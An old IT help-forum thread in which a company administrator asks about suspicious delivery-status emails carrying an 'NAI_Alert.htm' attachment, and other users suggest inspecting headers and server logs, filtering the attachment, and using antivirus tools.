Possible virus??

A lot of people in our company have been receiving a suspicious email lately.  I haven't been able to find any information about this message at all, though.  The message has no from address, the subject is 'NOTICE: mail delivery status', the body is empty and there is an attachment called NAI_Alert.htm.  We have Norton 8.1, mostly Windows 98 machines, everyone uses Outlook 2000 and a Win NT 4 server.  Any ideas on what this is or how to stop the messages from coming.  The first reported time this message was received was about three weeks ago.  Since then more and more people have been receiving it.

Thank you.
CuhoAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

FocusynCommented:
NAI alert is a Network Associates AntiVirus Software alert.  A legitimate email of this type would indicate that a message contained a virus and that the virus was removed from the email.  The file NAI_Alert.htm should provide details as to which virus, and when and where it was detected.  If you want to see where the mesasges are coming from, open one of the emails on a non-critical machine protected with the latest antivirus updates etc, and go in to the view options in Outlook.  Choose the "View Internet Header" option, which will display the header information for the email.  That should indicate the originating SMTP server from which the email arrived.  If there is no information in the header, then it likely came from somewhere within your organization.  Check to see if the server has a NEtwork ASsociates antivirus product on it.  If you get no headers, you'll need to look in your Exchange server logs (try sort by date/time and match up with one of the recieved messages).  The server logs should again indicate from where and exactly when the message was delivered and to whom.  The difference in the Exchange logs is that if the mail originated from within your organization, it will be able to tell you that, as well as tell you the ip address and DNS info about the originating server even if the sender has masked the headers.  

Important to note here, that many recent virii use delivery status messages to actually spread the virii as email worms.  They send alerts, undeliverable and failed status messages with attached files named alert.txt etc (file names used by popular email server antivirus products) and when or if you open that file, it is the actual virus paylod.  That's why I suggest you open the message on a spare computer with the latest antivirus software.  If it's a legitimate email from somewhere, the htm file should contain info on the virus, and if it's not, then the htm file probably IS a virus, or malicious html code that redirects your computer to a direct download of the virus.  Rather than open the file, you may want to use save as, then "Open With" it with notepad.exe and look at the code to see whether there is an actual mesage in there or some kind of script or redirect.  That should give you some starting points to get you going.

As far as stopping them, you can create a server filter/rule that auto-deletes all messages containing attachments called NAI_Alert.htm before delivery to user mailboxes.
0
knoxj81Commented:
Cuho,

That is not a legit attachment. Internal or External it's obviously a worm. Check out: http://www.gfi.com/mailsecurity/  if you'd like to prevent future issues with worms and viruses within your network. The idea Focusyn suggested above is okay to prevent that one specific attachment, however what about tomorrow's threats and next weeks? Trying to prevent attacks one at a time manually isn't going to work in a large network enviroment. You need a program that will handle that for you, update for you, and even give you reports to show you status.

Good Luck,

Jorden

**Please advise if you have any questions or concerns.**
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Asta CuTechnical consultant & graphic designCommented:
I checked the McAfee site and did not see anything about this NAI_Alert.htm.  Could well be as noted above, spoofed email; and intrusion.
http://ts.mcafeehelp.com/default.asp?siteID=1&resolution=1024x768&rurl=&rqs=
NAI_Alert.htm

For Office 2000, would highly recommend checking for updates and patches here to ensure you've got any protections available from MS .... http://www.officeupdate.com

We use McAfee, and can report such issues; suspect Norton has the same and may be worth a shot as well.
0
Top Threats of Q1 & How to Defend Against Them

WEBINAR: Join WatchGuard CTO and our Threat Research Team on Aug. 2nd to hear the findings from our Q1 Internet Security Report! Learn more about the top threats detected in the first quarter and how you can defend your business against them!

Cyber-DudeCommented:
No 'From' address and an HTML link?
My guess is that this file contains a link to a remote site to install some sort of trojan. If you have any Exchnage like server; there are many tools for you within that server to eliminate or prevent such maillings from appearing..

Cyber
0
CuhoAuthor Commented:
Thanks everyone.  The messages have stopped, for now.  I didn't get a chance to look into the source code of the htm file.  Because we use Norton, I will assume it is a trojan off some sort.  I'll post more when I know more.
0
Asta CuTechnical consultant & graphic designCommented:
Listening further when more is needed.
0
knoxj81Commented:
astaec, many viruses, especially worms generate random file names. This is important to prevent manually detection. People that just google the filename and/or check a vendor's website are better off going to multiple sites and scanning the file. Don't relie on a filename for detection.
0
Asta CuTechnical consultant & graphic designCommented:
Good point, knoxj81.  The variants and problems are ghastly and tough to isolate; they become more and more complex all the time and tougher to isolate and kill.   ":0) Asta
0
knoxj81Commented:
exactly. =)
0
CuhoAuthor Commented:
OK, the message has stopped.  I spoke with my ISP and they do have MacAfee but said these messages shouldn't get through to us.  I even looked at the source for the message and found nothing interesting at all.  I guess it was nothing.
0
Asta CuTechnical consultant & graphic designCommented:
Thank you.
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Security

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.